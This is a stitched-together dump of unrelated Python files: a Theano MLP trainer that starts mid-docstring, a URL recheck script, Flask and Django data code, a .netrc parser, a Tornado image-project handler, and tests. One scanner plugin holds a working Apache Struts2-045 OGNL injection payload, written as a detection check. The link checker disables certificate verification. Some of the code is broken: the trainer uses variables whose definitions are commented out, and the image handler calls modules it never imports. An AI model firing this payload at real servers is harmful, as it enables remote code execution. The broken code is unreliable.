The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda1 is, the sparser the input weights are.
lambda2: float scalar, control the smoothness of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda2 is, the smoother the input weights are.
alpha1: float scalar, control the sparsity of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha1 is, the sparser the MLP weights are.
alpha2: float scalar, control the smoothness of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha2 is, the smoother the MLP weights are.
n_hidden, vector of int, n_hidden[i]: number of hidden units of the i-th layer.
n_epochs: int scalar, the maximal number of epochs.
batch_size: int scalar, minibatch size.
activation_func: string, specify activation function. {"tanh" (default),"sigmoid"}
rng: numpy random number state.
OUTPUTS:
classifier: object of MLP, the model learned, returned for testing.
training_time: float, training time in seconds.
"""
train_set_x = theano.shared(numpy.asarray(train_set_x_org,dtype=theano.config.floatX),borrow=True)
train_set_y = T.cast(theano.shared(numpy.asarray(train_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
valid_set_x = theano.shared(numpy.asarray(valid_set_x_org,dtype=theano.config.floatX),borrow=True)
valid_set_y = T.cast(theano.shared(numpy.asarray(valid_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
# compute number of minibatches for training, validation and testing
n_train_batches = int(math.ceil(train_set_x.get_value(borrow=True).shape[0] / batch_size))
# shared variable to reduce the learning rate
learning_rate_shared=theano.shared(learning_rate,name='learn_rate_shared')
decay_rate=T.scalar(name='decay_rate',dtype=theano.config.floatX)
reduce_learning_rate=theano.function([decay_rate],learning_rate_shared,updates=[(learning_rate_shared,learning_rate_shared*decay_rate)])
## define the model below
num_feat=train_set_x.get_value(borrow=True).shape[1] # number of features
n_cl=len(numpy.unique(train_set_y_org)) # number of classes
activations={"tanh":T.tanh,"sigmoid":T.nnet.sigmoid,"relu":relu}
activation=activations[activation_func]
# build a MPL object
classifier = DFS(rng=rng, n_in=num_feat, n_hidden=n_hidden, n_out=n_cl,
lambda1=lambda1, lambda2=lambda2, alpha1=alpha1, alpha2=alpha2,
activation=activation)
train_model_one_iteration=classifier.build_train_function(train_set_x, train_set_y, batch_size,
alpha, learning_rate_shared)
validate_model=classifier.build_valid_function(valid_set_x, valid_set_y, batch_size)
print '... training'
# early-stopping parameters
patience = 5000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
#max_num_epoch_change_learning_rate=100
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate
#max_num_epoch_change_rate=0.8
#learning_rate_decay_rate=0.8
epoch_change_count=0
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
epoch_change_count=epoch_change_count+1
if epoch_change_count % max_num_epoch_change_learning_rate ==0:
reduce_learning_rate(learning_rate_decay_rate)
max_num_epoch_change_learning_rate= \
cl.change_max_num_epoch_change_learning_rate(max_num_epoch_change_learning_rate,max_num_epoch_change_rate)
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate
epoch_change_count=0
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model_one_iteration(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = validate_model()
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f %%' % \
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
num_epoch_not_improve=0
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
# save a copy of the currently best model parameter
best_model_params=classifier.get_params()
if patience <= iter:
done_looping = True
break
if this_validation_loss >= best_validation_loss:
num_epoch_not_improve=num_epoch_not_improve+1
if num_epoch_not_improve>=max_num_epoch_not_improve:
done_looping = True
break
# set the best model parameters
classifier.set_params(best_model_params)
end_time = time.clock()
training_time=end_time-start_time
print 'Training time: %f' %(training_time/60)
print 'Optimization complete with best validation score of %f,' %(best_validation_loss * 100.)
return classifier, training_time
def test_model(classifier, test_set_x_org, batch_size):
"""
Predict class labels of given data using the model learned.
INPUTS:
classifier_trained: object of DFS, the model learned by function "train_model".
test_set_x_org: numpy 2d array, each row is a sample whose label to be predicted.
batch_size: int scalar, batch size, efficient for a very large number of test samples.
OUTPUTS:
test_set_y_predicted: numpy int vector, the class labels predicted.
test_set_y_predicted_prob: numpy float vector, the probabilities.
test_time: test time in seconds.
"""
start_time=time.clock()
test_set_x = theano.shared(numpy.asarray(test_set_x_org,dtype=theano.config.floatX),borrow=True)
test_model_func=classifier.build_test_function(test_set_x, batch_size)
test_set_y_predicted,test_set_y_predicted_prob=test_model_func()
end_time=time.clock()
test_time=end_time-start_time
return test_set_y_predicted,test_set_y_predicted_prob,test_time
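# A minimal usage sketch on synthetic data; the shapes, class count and hyper-parameters
# below are illustrative assumptions, not values from the module.
if __name__ == '__main__':
    rng_demo = numpy.random.RandomState(100)
    X_train = rng_demo.rand(200, 50)
    y_train = rng_demo.randint(0, 2, 200)
    X_valid = rng_demo.rand(60, 50)
    y_valid = rng_demo.randint(0, 2, 60)
    classifier, training_time = train_model(
        train_set_x_org=X_train, train_set_y_org=y_train,
        valid_set_x_org=X_valid, valid_set_y_org=y_valid,
        n_hidden=[32, 16], n_epochs=10, batch_size=20)
    y_pred, y_pred_prob, test_time = test_model(classifier, X_valid, batch_size=20)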
|
import requests
import requests_ftp
import re
import sys
import urllib3
urllib3.disable_warnings()
# NOTE: urllib warnings are disabled because https certificate validation is disabled.
# In general, this is not a secure practice; see more here: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
# It was disabled here because of request failures caused by certificate-related errors
# that are encountered by automated scripts but not web users.
def makereq(url, protocol, timeout=10, allow_redirects=False):
# Sends a request using the specified protocol and interprets
# the response, returning either the HTTP/FTP status code or,
# in the case of request errors such as timeouts, "-1"
tosend = f'{protocol}://{url}'
try:
if protocol != 'ftp':
# NOTE: To avoid annoying quirks with SSL cert validation, this doesn't check whether
# the certs are valid.
r = requests.get(tosend, timeout=timeout, verify=False, stream=True, allow_redirects=allow_redirects)
else:
r = s.list(tosend, timeout=timeout)
except requests.exceptions.Timeout:
print(f' {protocol}: Timeout')
return -1
except requests.exceptions.ConnectionError as e:
print(f' {protocol}: Connection error: {e}')
return -1
except Exception as e:
print(f' {protocol}: WEIRD: {e} ({type(e)})')
return -1
# if the request completed:
print(f' {protocol}: {r.status_code}')
# If the request got a redirect response, follow the redirection to make
# sure the destination actually works:
if protocol == 'http' and r.status_code in range(300,400) and not allow_redirects:
print(f' {protocol}: Following redirects...')
new = makereq(url, protocol, timeout, True)
if new != 200: # TODO: Check why 200+ successful calls were recorded as 200s and not 301s
print(f' {protocol}: Broken redirect: Saving redirected status code {new}')
return new
if protocol == 'ftp' and r.status_code > 399:
# if the URL is to a file instead of a directory:
print(f' {protocol}: Trying SIZE instead of LIST')
r = s.size(tosend,timeout=timeout)
print(f' {protocol}: {r.status_code}')
return r.status_code
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Script expects two command-line arguments: source file and output file.")
print("Example: `python recheck_timeouts.py ../analysis/links.bulk.csv output_new.csv`")
exit(1)
# Drag in the ftp adapter for the "requests" module:
requests_ftp.monkeypatch_session()
s = requests.Session()
# set a timeout that can be used for all the requests:
timeout = 10
with open(sys.argv[2], 'w', 1) as httpfile, open(sys.argv[1], 'r') as fileWithLinks:
skipFirstLine = fileWithLinks.readline() # skip header row
httpfile.write('type,journal,id,year,link,code,flag.uniqueness,oldcode,newlink\n')
linecount = 0
for line in fileWithLinks:
linecount += 1
elements = line.split(',')
code = int(elements[5])
# NOTE: This is where you can set which responses you want to double-check.
# Any entry for which this conditional returns True will get skipped.
if code not in range(300,400):
httpfile.write(','.join(elements))
continue
elements[6] = elements[6][0] # trim linebreak from last element
elements.append(elements[5]) # save value in 'oldcode' column
# remove (valid) protocols from URLs
url = re.sub('^https?://', '', elements[4])
url = re.sub('^s?ftps?://', '', url)
print(f'{linecount} Testing {url}')
ftpresult = -1
httpresult = makereq(url, 'http', timeout)
# if the http call isn't in our "success" category, try FTP:
if httpresult < 200 or httpresult > 399:
ftpresult = makereq(url, 'ftp', timeout)
# If we made an FTP call that didn't time out, record that status,
# otherwise use whatever the HTTP call returned:
elements[5] = str(httpresult if ftpresult == -1 else ftpresult)
elements.append(str('http' if ftpresult == -1 else 'ftp'))
# write the new entry to disk
httpfile.write(f'{",".join(elements)}\n')
|
#import numpy as np
# library of patterns
|
import os
import csv
import time
from flask_script import Command, Option
from cnf.settings import ROOT_PATH
class Import(Command):
option_list = (
Option('--source', '-s', dest='source'),
Option('--batch', '-b', dest='batch', default=1000),
)
def csv(self, filename):
_f = open(os.path.join(self.data_path, filename, ), 'r', encoding='iso8859')
r = csv.reader(_f)
next(r)
return r
def load_data(self, iterable, model, field_map, batch=1000):
total = 0
pending = []
for items in iterable:
items = [x for x in items if x]
if items:
pending.append(model(**dict(zip(field_map, items))))
total += 1
if len(pending) >= batch:
model.objects.insert(pending)
pending = []
if pending:
model.objects.insert(pending)
return total
def run(self, source, batch):
batch = int(batch)
self.data_path = source
from flask import current_app as app
with app.app_context():
from cnf.models import (
CNFFoodGroup, CNFFoodSource, CNFFoodName, CNFNutrientAmount,
CNFNutrientName, CNFNutrientSource, CNFRefuseAmount, CNFRefuseName,
CNFYieldAmount, CNFYieldName, CNFConversionFactor, CNFMeasureName
)
# I'll make this pep8 some day, maybe :)
STEPS = (
('FOOD GROUP.csv', CNFFoodGroup, ('id', 'code', 'name', 'name_f')),
('FOOD SOURCE.csv', CNFFoodSource, ('id', 'code', 'description', 'description_f')),
('FOOD NAME.csv', CNFFoodName, ('id', 'code', 'food_group', 'food_source', 'description', 'description_f', 'date_of_entry', 'date_of_publication', 'country_code', 'scientific_name')),
('NUTRIENT AMOUNT.csv', CNFNutrientAmount, ('food', 'nutrient_name', 'nutrient_value', 'standard_error', 'number_of_observations', 'nutrient_source', 'date_of_entry')),
('NUTRIENT NAME.csv', CNFNutrientName, ('id', 'nutrient_code', 'nutrient_symbol', 'unit', 'name', 'name_f', 'tagname', 'nutrient_decimals')),
('NUTRIENT SOURCE.csv', CNFNutrientSource, ('id', 'code', 'description', 'description_f')),
('CONVERSION FACTOR.csv', CNFConversionFactor, ('food', 'measure', 'value', 'date_of_entry')),
('MEASURE NAME.csv', CNFMeasureName, ('id', 'name', 'name_f')),
('REFUSE AMOUNT.csv', CNFRefuseAmount, ('food', 'refuse_name', 'amount', 'date_of_entry')),
('REFUSE NAME.csv', CNFRefuseName, ('id', 'name', 'name_f')),
('YIELD AMOUNT.csv', CNFYieldAmount, ('food', 'yield_name', 'amount')),
('YIELD NAME.csv', CNFYieldName, ('id', 'name', 'name_f')),
)
for filename, model, fields in STEPS:
print('Importing', filename)
# TODO Dropping everything probably should be an option
# Not sure what to expect when you don't though
print(' Dropping all items')
model.objects.all().delete()
s = time.time()
cf = self.csv(filename)
count = self.load_data(cf, model, fields, batch=batch)
d = time.time() - s
print(' ', count, 'rows imported in %.04fs\n' % d)
|
"""Config file"""
DATABASE_URI = "postgresql://username.password@port/database"
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('jssmanifests', '0019_auto_20150618_1543'),
]
operations = [
migrations.CreateModel(
name='JSSSite',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('jsssiteid', models.IntegerField(verbose_name=b'JSS Site ID')),
('jsssitename', models.CharField(max_length=1024, verbose_name=b'Type Label')),
],
),
migrations.CreateModel(
name='JSSUser',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('lastrefresh', models.DateTimeField(auto_now=True)),
('sites', models.ManyToManyField(to='jssmanifests.JSSSite')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
]
|
"""An object-oriented interface to .netrc files."""
# Module and documentation by Eric S. Raymond, 21 Dec 1998
from __future__ import with_statement
import os, shlex
__all__ = ["netrc", "NetrcParseError"]
class NetrcParseError(Exception):
"""Exception raised on syntax errors in the .netrc file."""
def __init__(self, msg, filename=None, lineno=None):
self.filename = filename
self.lineno = lineno
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)
class netrc:
def __init__(self, file=None):
if file is None:
try:
file = os.path.join(os.environ['HOME'], ".netrc")
except KeyError:
raise IOError("Could not find .netrc: $HOME is not set")
self.hosts = {}
self.macros = {}
with open(file) as fp:
self._parse(file, fp)
def _parse(self, file, fp):
lexer = shlex.shlex(fp)
lexer.wordchars += r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
while 1:
# Look for a machine, default, or macdef top-level keyword
toplevel = tt = lexer.get_token()
if not tt:
break
elif tt == 'machine':
entryname = lexer.get_token()
elif tt == 'default':
entryname = 'default'
elif tt == 'macdef': # Just skip to end of macdefs
entryname = lexer.get_token()
self.macros[entryname] = []
lexer.whitespace = ' \t'
while 1:
line = lexer.instream.readline()
if not line or line == '\012':
lexer.whitespace = ' \t\r\n'
break
self.macros[entryname].append(line)
continue
else:
raise NetrcParseError(
"bad toplevel token %r" % tt, file, lexer.lineno)
# We're looking at start of an entry for a named machine or default.
login = ''
account = password = None
self.hosts[entryname] = {}
while 1:
tt = lexer.get_token()
if (tt=='' or tt == 'machine' or
tt == 'default' or tt =='macdef'):
if password:
self.hosts[entryname] = (login, account, password)
lexer.push_token(tt)
break
else:
raise NetrcParseError(
"malformed %s entry %s terminated by %s"
% (toplevel, entryname, repr(tt)),
file, lexer.lineno)
elif tt == 'login' or tt == 'user':
login = lexer.get_token()
elif tt == 'account':
account = lexer.get_token()
elif tt == 'password':
password = lexer.get_token()
else:
raise NetrcParseError("bad follower token %r" % tt,
file, lexer.lineno)
def authenticators(self, host):
"""Return a (user, account, password) tuple for given host."""
if host in self.hosts:
return self.hosts[host]
elif 'default' in self.hosts:
return self.hosts['default']
else:
return None
def __repr__(self):
"""Dump the class data in the format of a .netrc file."""
rep = ""
for host in self.hosts.keys():
attrs = self.hosts[host]
rep = rep + "machine "+ host + "\n\tlogin " + repr(attrs[0]) + "\n"
if attrs[1]:
rep = rep + "account " + repr(attrs[1])
rep = rep + "\tpassword " + repr(attrs[2]) + "\n"
for macro in self.macros.keys():
rep = rep + "macdef " + macro + "\n"
for line in self.macros[macro]:
rep = rep + line
rep = rep + "\n"
return rep
if __name__ == '__main__':
print netrc()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Ivar Vargas Belizario
# Copyright (c) 2021
# E-mail: ivar@usp.br
import tornado.ioloop
import tornado.web
import tornado.httpserver
import ujson
import glob
import os
import time
import sys
import pandas as pd
import numpy as np
import os.path
import math
import uuid
import zipfile
from io import BytesIO
from datetime import datetime
import threading
import SimpleITK as sitk
from bson.objectid import ObjectId
from vx.com.py.database.MongoDB import *
from vx.radpleura.Settings import *
from vx.radpleura.BaseHandler import *
from vx.radpleura.ROI import *
from vx.radpleura.Features import *
from vx.radpleura.VSI import *
from vx.radpleura.Classification import *
from vx.radpleura.SplitImage import *
class Query(BaseHandler):
#Get RequestHandler
def get(self):
dat = self.get_argument('data')
app = ujson.loads(dat)
#app = DataTransfer()
#app.load(dat)
obj = ""
if app["argms"]["type"]==0:
pass;
elif app["argms"]["type"]==1:
obj = self.listimages();
#elif app["argms"]["type"]==2:
# obj = self.listfilesdirs(app["argms"]);
elif app["argms"]["type"]==3:
obj = self.makeimgfromvsi(app["argms"]);
elif app["argms"]["type"]==4:
obj = None
elif app["argms"]["type"]==5:
obj = self.getregions(app["argms"]);
# print("obj-x",obj);
elif app["argms"]["type"]==7:
obj = self.makeclassification(self.current_user, app["argms"]);
# print("obj-x",obj);
elif app["argms"]["type"]==8:
obj = self.listprojects(self.current_user, app["argms"]);
# print("obj-x",obj);
elif app["argms"]["type"]==9:
obj = self.openproject(self.current_user, app["argms"]);
self.write(obj)
self.finish()
#Post RequestHandler
def post(self):
dat = self.get_argument('data')
app = ujson.loads(dat)
rs = ""
if self.current_user:
#print("app.argms", app, self.request.files['fileu'][0])
if app["argms"]["type"]==6:
rs = Query.uploadfiledata(self.current_user, self.request.files['fileu'][0]);
self.write(rs)
#pass
# static query methods
"""
def listimages():
fileso = []
for name in os.listdir(Settings.DATA_PATH):
# print("name", name)
if name.endswith(".png") or name.endswith(".jpg") or name.endswith(".jpeg"):
# fileso.append(str(os.path.join(outdir, str(name))))
# fileso.append({"name":Settings.IMAGE_PATH+str(name)})
fileso.append({"name":str(name)})
return {"response":fileso}
"""
@staticmethod
def openFile(pathf):
dfile = {}
with open(pathf,'r') as fp:
dfile = ujson.load(fp)
return dfile
@staticmethod
def writeFile(pathf, rdata):
with open(pathf,'w') as fp:
ujson.dump(rdata, fp)
@staticmethod
def listimages():
fileso = []
"""
for name in os.listdir(Settings.DATA_PATH):
if name.endswith(".png") or name.endswith(".jpg") or name.endswith(".jpeg"):
fileso.append({"name":str(name)})
"""
ini = 2021
months = ["01","02","03","04","05","06","07","08","09","10","11","12"]
now = 2021
for y in range(ini,now+1):
for m in months:
folder = os.path.join(Settings.DATA_PATH,str(y),str(m))
if os.path.exists(folder):
for ide in os.listdir(folder):
if os.path.isdir(os.path.join(folder, ide)):
fileobj = os.path.join(folder, ide, "db.obj")
if os.path.exists(fileobj):
dat = Query.openFile(fileobj)
#print("dat",dat, fileobj)
fileso.append(dat)
#fileso[ide] = {"y":y, "m":m, "data":dat}
#fileso.sort(key=lambda item:item['date'], reverse=True)
#fileso = sorted(fileso.items(), key=lambda x: x["date"])
#fileso = sorted(fileso, key=lambda k: k['date'])
#print(fileso)
fileso = sorted(fileso, key = lambda i: (i['date']), reverse=True)
return {"response":fileso}
# static query methods
@staticmethod
def listfilesdirs(argms):
path = argms["path"]
direc = argms["directory"]
pathi = path
if direc!="":
pathi += "/"+direc
result = []
#print("path", path)
#print("direc", direc)
pathi = os.path.join(path,direc)
#print("pathii", pathi)
try:
for fil in os.listdir(pathi):
cc = os.path.join(pathi,fil)
modTimesinceEpoc = os.path.getmtime(cc)
modificationTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(modTimesinceEpoc))
#print("cc",cc)
if os.path.isfile(cc):
result.append({"name":fil,"type":1,"date":modificationTime})
else:
result.append({"name":fil,"type":0,"date":modificationTime})
result = sorted(result, key=lambda k: (k['type'], k['name']))
result = {"response":{"path":pathi,"files":result}, "error":0}
except FileNotFoundError:
result = {"response":"FileNotFoundError", "error":1}
except PermissionError:
result = {"response":"PermissionError", "error":1}
except:
result = {"response":"UndefinedError", "error":1}
finally:
#print("Done error checking")
pass
return result
# static query methods
@staticmethod
def openproject(iduser, argms):
idpj = ObjectId(argms["idpj"])
print("idpj", idpj)
res = list(MongoDB.find(DBS.DBMEDIA, "app_lung", {"_id": idpj}))
for rs in res:
rs["_id"] = str(rs["_id"])
rs["_id_user"] = str(rs["_id_user"])
pf = os.path.join(Settings.DATA_PATH, rs["y"]+"/"+rs["m"]+"/"+rs["_id"]+"/pieces.json");
if os.path.exists(pf):
#print("pahfile", pf)
rs["pieces"] = Query.openFile(pf)
#print("roisx", rois)
rs["pathpieces"] = "data/"+rs["y"]+"/"+rs["m"]+"/"+rs["_id"]+"/pieces/"
print("rs", res)
return {"response":res, "error":0}
# static query methods
@staticmethod
def listprojects(iduser, argms):
#iduser = argms["iduser"]
iduser = ObjectId(iduser.decode("utf-8"))
#print("iduser xxxx", iduser)
#rest = []
rs = list(MongoDB.aggregate(DBS.DBMEDIA, "app_lung",
[
{"$lookup":
{
"from": "user",
"localField": "_id_user",
"foreignField" : "_id",
"as": "usersUnits",
}
},
{"$match": {
"$or": [
{"_id_user": iduser},
{"shared": 1}
]
}
},
{"$project":
{
"_id" : 1,
"_id_user": 1 ,
"name": 1,
"date_update" : 1,
"factor" : 1,
"m" : 1,
"y" : 1,
"shared" : 1,
"status" : 1,
"statusmsg" : 1,
"usersUnits._id" : 1 ,
"usersUnits.name" : 1 ,
}
},
{
"$sort": {
"date_update": -1
}
}
]
))
#print("xxxxresx", rs)
#{"_id_user": iduser}))
print("zzzzzzsrs", rs)
for i in range(len(rs)):
rs[i]["_id"] = str(rs[i]["_id"])
rs[i]["_id_user"] = str(rs[i]["_id_user"])
if len(rs[i]["usersUnits"])==1:
rs[i]["usersUnits"][0]["_id"] = str(rs[i]["usersUnits"][0]["_id"])
#row["rois"] = []
return {"response":rs, "error":0}
@staticmethod
def makedir(outdir):
if not os.path.exists(outdir):
os.makedirs(outdir)
@staticmethod
def getPathSave(mainpath):
dt_year = datetime.now().strftime("%Y")
dt_mont = datetime.now().strftime("%m")
mpth = os.path.join(mainpath, dt_year, dt_mont)
Query.makedir(mpth)
return dt_year, dt_mont, mpth
# static query methods
@staticmethod
def makeimgfromvsi(argms):
name = argms["name"]
path = argms["path"]
file = argms["file"]
factor = argms["factor"]
#print("CC",name, path, file, factor)
vsifile = os.path.join(path,file)
""" pathsave = getdiresave(Settings.DATA_PATH) """
#convertvsi2img(vsifile, factor, Settings.DATA_PATH, "df3wfsd")
        # getPathSave returns (year, month, path); the record id is generated separately below
        y, m, pathsave = Query.getPathSave(Settings.DATA_PATH)
        fileid = uuid.uuid4().hex
        idf = fileid  # assumption: reuse the generated file id as the "id" stored in db.obj
t = threading.Thread(target=Query.convertvsi2img, args=(vsifile, factor, pathsave, fileid,))
t.start()
dt_string = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
dbdat = {
"y":y,
"m":m,
"id":idf,
"name":name,
"date":dt_string,
"image":fileid+".jpg",
"tumbail":fileid+".jpg",
"atributes":{"factor":factor,"status":0,"statusmsg":"working..."},
"images":[]
}
"""
"images":[
{
"name":"original",
"date":dt_string,
"image":fileid+".jpg",
"tumbail":fileid+"_tumbail.jpg",
"atributes":{},
}
]
"""
Query.writeFile(os.path.join(pathsave,"db.obj"), dbdat)
#makeimage(filevis, factor, pathsave)
result = {"response":"ok", "error":0}
return result
# get regions
@staticmethod
def getregions(argms):
results = None
try:
pahfile = os.path.join(Settings.DATA_PATH, argms["path"]+"/"+"contours.json")
print("pahfile", pahfile)
rois = Query.openFile(pahfile)
print("roisx", rois)
results = {"response":rois, "error":0}
except FileNotFoundError:
results = {"response":"FileNotFoundError", "error":1}
print("error file not")
except PermissionError:
results = {"response":"PermissionError", "error":1}
print("permission error")
except:
results = {"response":"UndefinedError", "error":1}
print("error undefined")
finally:
#print("Done error checking")
pass
return results
@staticmethod
def convertvsi2img(vsifile, factor, pathout, outfile):
outfiletiff = os.path.join(pathout,outfile+".tiff")
outfilejpg = os.path.join(pathout,outfile+".jpg")
outtumbailjpg = os.path.join(pathout,outfile+"_tumbail.jpg")
BaseManager.register('VSI', VSI, exposed=['getAux','getnTilesX','getnTilesY'])
manager = BaseManager()
manager.start()
obj = manager.VSI(vsifile, float(factor))
#print("obj.aux", obj.getAux())
#obj = VSI(vsifile, float(factor))
image = VSI.makeimage(obj)
#image = readVSI(vsifile, float(factor))
cv2.imwrite(outfiletiff, image)
cv2.imwrite(outfilejpg, image)
fileobj = os.path.join(pathout, "db.obj")
dat = Query.openFile(fileobj)
dat["atributes"]["status"] = 1
dat["atributes"]["statusmsg"] = ""
Query.writeFile(fileobj, dat)
@staticmethod
def uploadfiledata(iduser, file):
r = """<script>
parent.mwalert('','Error: upload file');
parent.openprojects();
</script>"""
iduser = ObjectId(iduser.decode("utf-8"))
path = Settings.DATA_PATH
fname, ext = os.path.splitext(file['filename'])
ext = ext.lower()
ye, mo, path = Query.getPathSave(Settings.DATA_PATH)
rowdata = {
"_id_user":iduser,
"name":fname,
"y":ye,
"m":mo,
"date_create":Query.now(),
"date_update":Query.now(),
"factor":1.0,
"rois":[],
"shared":0,
"status":1,
"statusmsg":"new data lung...",
}
idin = None
try:
idin = MongoDB.insert(DBS.DBMEDIA, "app_lung", rowdata)
idin = str(idin)
idin = Query.converid(idin)
rs = list(MongoDB.find(DBS.DBMEDIA, "app_lung", {"_id": idin}))
for rr in rs:
tilesize = 500
tileperce = 0.01
path = os.path.join(path, str(idin))
Query.makedir(path)
Query.savefile(path, file['body'])
ROI.execute(path, tilesize, tileperce)
Features.execute(path)
SplitImage.execute(path, 500)
r = "<script>parent.openprojects();</script>"
except Exception as e:
print("error upload file", e)
            if idin is not None:
Query.dropdataset(os.path.join(Settings.DATA_PATH, ye, mo, str(idin)) )
return r
@staticmethod
def dropdataset(idin):
filefe = str(idin)
#os.system("rm -rf "+filefe)
MongoDB.delete(DBS.DBMEDIA, "app_lung", {"_id": ObjectId(idin)})
r = "<script>parent.openprojects();</script>"
return {"response":r};
@staticmethod
def makeclassification(usid, argms):
idus = usid
idpj = argms["idpj"]
idrois = argms["idroi"]
idmodelversion = argms["idmodelversion"]
idmodel = argms["idmodel"]
print("argms classs", argms)
parthquery = os.path.join(Settings.DATA_PATH, argms["path"])
#parthquery = os.path.join(Settings.DATA_PATH, argms["path"])
ypred, labels = Classification.predict(parthquery, idmodelversion, idmodel, idrois)
rs = {"yp":ypred, "labels":labels}
print("rs", rs)
return {"statusopt":0, "statusval":"", "response":rs}
#return {"statusopt":0, "statusval":"", "response":[]}
@staticmethod
def savefile(path, data):
pfiletiff = os.path.join(path, "original.tiff")
pfilejpg = os.path.join(path, "original.jpg")
#create directory
output_file = open(pfiletiff, mode="wb")
output_file.write(data)
output_file.close()
image = sitk.ReadImage(pfiletiff)
sitk.WriteImage(image, pfilejpg)
@staticmethod
def now():
return datetime.now().strftime('%Y-%m-%d %H:%M:%S')
@staticmethod
def converid(idin):
"""
#idin = file
if Settings.MULIUSER == 1:
#idin = idin.decode("utf-8");
idin = ObjectId(idin) """
idin = ObjectId(idin)
return idin
|
import requests
from celery_app.utils.utils import insert_vuln_db
from celery_app.config.config import web_port_short
#Apache Struts2-045 remote code execution (CVE-2017-5638)
plugin_id=42
default_port_list=web_port_short
def check(host, port=80):
scheme = 'https' if '443' in str(port) else 'http'
target = '{}://{}:{}'.format(scheme, host, port)
hits = ['biuframework']
try:
targets = [target]
headers = {"Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('biu'+'framework')).(#o.close())}"}
#requests.packages.urllib3.disable_warnings()
with requests.Session() as session:
for target in targets:
response = session.get(target, timeout=10, verify=False, headers=headers)
for hit in hits:
if hit in response.text:
output = response.text
insert_vuln_db(host, target, output, plugin_id)
return True, host, target, output
except Exception as error:
return False
return False
|
import os
import tempfile
import pytest
from reminders import app
@pytest.fixture
def client():
db_fd, app.config['DATABASE'] = tempfile.mkstemp()
app.config['TESTING'] = True
with app.test_client() as client:
yield client
os.close(db_fd)
os.unlink(app.config['DATABASE'])
def test_basic_fetch(client):
"""Basic get should list reminders."""
res = client.get('/')
assert b'All Your Reminders' in res.data
def test_save_check_data(client):
"""Save should require a reminder message."""
res = client.post('/save', data="")
assert b'This field is required' in res.data
|
from .changelog import Changelog
from .types import ChangelogType
from .changelog_spec import ConventionalCommitChangelog
__all__ = ("Changelog", "ConventionalCommitChangelog", "ChangelogType")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-04 06:31
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20160904_1201'),
]
operations = [
migrations.RenameModel(
old_name='Battles',
new_name='Battle',
),
]
|
import os
import configparser
import pytest
from rjm.runners import funcx_slurm_runner
from rjm.errors import RemoteJobRunnerError
@pytest.fixture
def configobj():
config = configparser.ConfigParser()
config["FUNCX"] = {
"remote_endpoint": "abcdefg",
}
config["SLURM"] = {
"slurm_script": "run.sl",
"poll_interval": "1",
}
return config
@pytest.fixture
def runner(mocker, configobj):
mocker.patch('rjm.config.load_config', return_value=configobj)
runner = funcx_slurm_runner.FuncxSlurmRunner()
return runner
def mocked_run_function(function, *args, **kwargs):
return function(*args, **kwargs)
def test_make_remote_directory_single(runner, tmpdir):
runner.run_function = mocked_run_function
remote_base_path = str(tmpdir)
prefix = "my-remote-dir"
full_path, basename = runner.make_remote_directory(remote_base_path, prefix)
assert os.path.basename(full_path) == basename
assert os.path.join(remote_base_path, basename) == full_path
assert os.path.isdir(full_path)
assert basename.startswith(prefix)
def test_make_remote_directory_list(runner, tmpdir):
runner.run_function = mocked_run_function
remote_base_path = str(tmpdir)
prefixes = ["my-remote-dir", "another-remote-dir"]
remote_dirs = runner.make_remote_directory(remote_base_path, prefixes)
assert type(remote_dirs) is list
assert len(remote_dirs) == len(prefixes)
for prefix, (full_path, basename) in zip(prefixes, remote_dirs):
assert os.path.basename(full_path) == basename
assert os.path.join(remote_base_path, basename) == full_path
assert os.path.isdir(full_path)
assert basename.startswith(prefix)
